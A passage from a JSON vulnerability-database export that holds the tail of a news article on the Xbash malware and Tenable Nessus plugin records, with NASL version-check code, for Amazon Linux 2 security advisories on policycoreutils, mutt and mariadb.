disclosed in October 2016 and has no CVE number assigned.\n * Redis arbitrary file writes, and remote command execution vulnerability disclosed in October 2015 with no CVE number assigned.\n * ActiveMQ arbitrary file write vulnerability (CVE-2016-3088), disclosed in earlier 2016.\n \n \nIf the entry point is a vulnerable Redis service, Xbash will send malicious JavaScript or VBScript payload for downloading and executing a [coinminer for Windows](<https://thehackernews.com/2018/03/cryptocurrency-mining-malware.html>) instead of its botnet and ransomware module. \n \nAs mentioned above, Xbash is developed in Python and then was converted to Portable Executable (PE) using PyInstaller, which can create binaries for multiple platforms, including Windows, Apple macOS, and Linux, and also provides anti-detection. \n \nThis, in turn, enables XBash to be truly [cross-platform malware](<https://thehackernews.com/2017/07/adwind-rat-malware.html>), though, at the time of writing, researchers found samples only for Linux and did not see any Windows or macOS versions of Xbash. \n \nUsers can protect themselves against XBash by following basic cybersecurity practices, including: \n \n\n\n * change default login credentials on your systems,\n * use strong and unique passwords,\n * keep your operating system and software up-to-date,\n * avoid downloading and running untrusted files or clicking links,\n * take backup of their data regularly, and\n * prevent unauthorized connection using a firewall.\n \n\n\nHave something to say about this article? Comment below or share it with us on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter](<https://twitter.com/thehackersnews>) or our [LinkedIn Group](<https://www.linkedin.com/company/the-hacker-news/>).\n", "reporter": "The Hacker News", "published": "2018-09-19T15:32:00", "type": "thn", "title": "New Malware Combines Ransomware, Coin Mining and Botnet Features in One", "enchantments": {"score": {"modified": "2018-09-19T15:47:47", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2016-3088"], "_object_type": "robots.models.thn.ThnBulletin", "modified": "2018-09-19T15:32:57", "id": "THN:E2ECFA2AA521F10B7A62A00D2F722C90", "href": "https://thehackernews.com/2018/09/ransomware-coinmining-botnet.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "nessus": [{"lastseen": "2018-09-20T00:09:42", "references": ["https://alas.aws.amazon.com/AL2/ALAS-2018-1076.html"], "pluginID": "117590", "description": "Context relabeling of filesystems is vulnerable to symbolic link attack, allowing a local, unprivileged malicious entity to change the SELinux context of an arbitrary file to a context with few restrictions. This only happens when the relabeling process is done, usually when taking SELinux state from disabled to enable (permissive or enforcing).(CVE-2018-1063)", "edition": 1, "reporter": "Tenable", "published": "2018-09-19T00:00:00", "title": "Amazon Linux 2 : policycoreutils (ALAS-2018-1076)", "type": "nessus", "enchantments": {"score": {"modified": "2018-09-20T00:09:42", "vector": "NONE", "value": 2.1}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-1063"], "modified": "2018-09-19T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:policycoreutils-gui", "p-cpe:/a:amazon:linux:policycoreutils-sandbox", "p-cpe:/a:amazon:linux:policycoreutils-python", "p-cpe:/a:amazon:linux:policycoreutils-debuginfo", "cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:policycoreutils-devel", "p-cpe:/a:amazon:linux:policycoreutils-restorecond", "p-cpe:/a:amazon:linux:policycoreutils", "p-cpe:/a:amazon:linux:policycoreutils-newrole"], "id": "AL2_ALAS-2018-1076.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117590", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2018-1076.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117590);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/19 10:04:09\");\n\n script_cve_id(\"CVE-2018-1063\");\n script_xref(name:\"ALAS\", value:\"2018-1076\");\n\n script_name(english:\"Amazon Linux 2 : policycoreutils (ALAS-2018-1076)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Context relabeling of filesystems is vulnerable to symbolic link\nattack, allowing a local, unprivileged malicious entity to change the\nSELinux context of an arbitrary file to a context with few\nrestrictions. This only happens when the relabeling process is done,\nusually when taking SELinux state from disabled to enable (permissive\nor enforcing).(CVE-2018-1063)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2018-1076.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update policycoreutils' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:P/A:N\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:policycoreutils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:policycoreutils-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:policycoreutils-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:policycoreutils-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:policycoreutils-newrole\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:policycoreutils-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:policycoreutils-restorecond\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:policycoreutils-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"policycoreutils-2.5-22.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"policycoreutils-debuginfo-2.5-22.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"policycoreutils-devel-2.5-22.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"policycoreutils-gui-2.5-22.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"policycoreutils-newrole-2.5-22.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"policycoreutils-python-2.5-22.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"policycoreutils-restorecond-2.5-22.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"policycoreutils-sandbox-2.5-22.amzn2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"policycoreutils / policycoreutils-debuginfo / policycoreutils-devel / etc\");\n}\n", "cvss": {"score": 3.3, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-20T00:08:40", "references": ["https://alas.aws.amazon.com/AL2/ALAS-2018-1077.html"], "pluginID": "117591", "description": "An issue was discovered in Mutt before 1.10.1 and NeoMutt before 2018-07-16. pop.c does not forbid characters that may have unsafe interaction with message-cache pathnames, as demonstrated by a '/' character.(CVE-2018-14362)\n\nAn issue was discovered in Mutt before 1.10.1 and NeoMutt before 2018-07-16. They allow remote IMAP servers to execute arbitrary commands via backquote characters, related to the mailboxes command associated with a manual subscription or unsubscription.(CVE-2018-14354)\n\nAn issue was discovered in Mutt before 1.10.1 and NeoMutt before 2018-07-16. They allow remote IMAP servers to execute arbitrary commands via backquote characters, related to the mailboxes command associated with an automatic subscription.(CVE-2018-14357)", "edition": 1, "reporter": "Tenable", "published": "2018-09-19T00:00:00", "title": "Amazon Linux 2 : mutt (ALAS-2018-1077)", "type": "nessus", "enchantments": {"score": {"modified": "2018-09-20T00:08:40", "vector": "NONE", "value": 7.5}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-14362", "CVE-2018-14354", "CVE-2018-14357"], "modified": "2018-09-19T00:00:00", "cpe": ["cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:mutt", "p-cpe:/a:amazon:linux:mutt-debuginfo"], "id": "AL2_ALAS-2018-1077.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117591", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2018-1077.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117591);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/19 10:04:09\");\n\n script_cve_id(\"CVE-2018-14354\", \"CVE-2018-14357\", \"CVE-2018-14362\");\n script_xref(name:\"ALAS\", value:\"2018-1077\");\n\n script_name(english:\"Amazon Linux 2 : mutt (ALAS-2018-1077)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An issue was discovered in Mutt before 1.10.1 and NeoMutt before\n2018-07-16. pop.c does not forbid characters that may have unsafe\ninteraction with message-cache pathnames, as demonstrated by a '/'\ncharacter.(CVE-2018-14362)\n\nAn issue was discovered in Mutt before 1.10.1 and NeoMutt before\n2018-07-16. They allow remote IMAP servers to execute arbitrary\ncommands via backquote characters, related to the mailboxes command\nassociated with a manual subscription or\nunsubscription.(CVE-2018-14354)\n\nAn issue was discovered in Mutt before 1.10.1 and NeoMutt before\n2018-07-16. They allow remote IMAP servers to execute arbitrary\ncommands via backquote characters, related to the mailboxes command\nassociated with an automatic subscription.(CVE-2018-14357)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2018-1077.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update mutt' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mutt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mutt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"mutt-1.5.21-28.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mutt-debuginfo-1.5.21-28.amzn2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mutt / mutt-debuginfo\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-20T00:03:38", "references": ["https://alas.aws.amazon.com/AL2/ALAS-2018-1078.html"], "pluginID": "117592", "description": "Vulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.57 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2017-10378 )\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.59 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2781)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server : Partition). Supported versions that are affected are 5.5.58 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 7.1 (Integrity and Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H).(CVE-2018-2562)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client mysqldump). Supported versions that are affected are 5.5.56 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).(CVE-2017-3651)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.59 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in MySQL Server, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.0 Base Score 7.7 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).(CVE-2018-2755)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.58 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2640)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.57 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 6.5 (Confidentiality impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).(CVE-2017-10379 )\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Replication). Supported versions that are affected are 5.5.57 and earlier. Difficult to exploit vulnerability allows high privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all MySQL Server accessible data. CVSS 3.0 Base Score 4.1 (Confidentiality impacts). CVSS Vector:\n(CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N).(CVE-2017-10268)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.56 and earlier. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Integrity impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).(CVE-2017-3653)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Locking). Supported versions that are affected are 5.5.59 and prior. Difficult to exploit vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.4 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2771)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Security: Encryption). Supported versions that are affected are 5.5.59 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).(CVE-2018-2767)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2817)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior.\nEasily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server.\nSuccessful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2668)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.57 and earlier. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2017-10384)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DML). Supported versions that are affected are 5.5.56 and earlier. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 4.9 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).(CVE-2017-3641)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: InnoDB). Supported versions that are affected are 5.5.59 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2819)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: Optimizer). Supported versions that are affected are 5.5.58 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2665)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.58 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2622)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Server: DDL). Supported versions that are affected are 5.5.59 and prior. Easily exploitable vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of MySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts).\nCVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).(CVE-2018-2813)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.56 and earlier. Easily exploitable vulnerability allows low privileged attacker with logon to the infrastructure where MySQL Server executes to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of MySQL Server accessible data as well as unauthorized read access to a subset of MySQL Server accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Confidentiality, Integrity and Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).(CVE-2017-3636)\n\nVulnerability in the MySQL Server component of Oracle MySQL (subcomponent: Client programs). Supported versions that are affected are 5.5.59 and prior. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score 5.9 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2761)", "edition": 1, "reporter": "Tenable", "published": "2018-09-19T00:00:00", "title": "Amazon Linux 2 : mariadb (ALAS-2018-1078)", "type": "nessus", "enchantments": {"score": {"modified": "2018-09-20T00:03:38", "vector": "NONE", "value": 5.0}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-2817", "CVE-2017-10379", "CVE-2018-2755", "CVE-2018-2819", "CVE-2018-2562", "CVE-2017-10378", "CVE-2018-2771", "CVE-2018-2767", "CVE-2018-2761", "CVE-2018-2668", "CVE-2018-2640", "CVE-2018-2781", "CVE-2017-3651", "CVE-2017-3641", "CVE-2018-2813", "CVE-2017-10268", "CVE-2018-2665", "CVE-2017-3653", "CVE-2017-10384", "CVE-2017-3636", "CVE-2018-2622"], "modified": "2018-09-19T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:mariadb-debuginfo", "p-cpe:/a:amazon:linux:mariadb-test", "p-cpe:/a:amazon:linux:mariadb-libs", "p-cpe:/a:amazon:linux:mariadb-server", "p-cpe:/a:amazon:linux:mariadb-devel", "cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:mariadb-embedded-devel", "p-cpe:/a:amazon:linux:mariadb-embedded", "p-cpe:/a:amazon:linux:mariadb", "p-cpe:/a:amazon:linux:mariadb-bench"], "id": "AL2_ALAS-2018-1078.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117592", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2018-1078.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117592);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/19 10:04:09\");\n\n script_cve_id(\"CVE-2017-10268\", \"CVE-2017-10378\", \"CVE-2017-10379\", \"CVE-2017-10384\", \"CVE-2017-3636\", \"CVE-2017-3641\", \"CVE-2017-3651\", \"CVE-2017-3653\", \"CVE-2018-2562\", \"CVE-2018-2622\", \"CVE-2018-2640\", \"CVE-2018-2665\", \"CVE-2018-2668\", \"CVE-2018-2755\", \"CVE-2018-2761\", \"CVE-2018-2767\", \"CVE-2018-2771\", \"CVE-2018-2781\", \"CVE-2018-2813\", \"CVE-2018-2817\", \"CVE-2018-2819\");\n script_xref(name:\"ALAS\", value:\"2018-1078\");\n\n script_name(english:\"Amazon Linux 2 : mariadb (ALAS-2018-1078)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Vulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: Optimizer). Supported versions that are\naffected are 5.5.57 and earlier. Easily exploitable vulnerability\nallows low privileged attacker with network access via multiple\nprotocols to compromise MySQL Server. Successful attacks of this\nvulnerability can result in unauthorized ability to cause a hang or\nfrequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.0\nBase Score 6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2017-10378 )\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: Optimizer). Supported versions that are\naffected are 5.5.59 and prior. Easily exploitable vulnerability allows\nhigh privileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n4.9 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2781)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server : Partition). Supported versions that are\naffected are 5.5.58 and prior. Easily exploitable vulnerability allows\nlow privileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server as well as\nunauthorized update, insert or delete access to some of MySQL Server\naccessible data. CVSS 3.0 Base Score 7.1 (Integrity and Availability\nimpacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H).(CVE-2018-2562)\n\nVulnerability in the MySQL Server component of Oracle 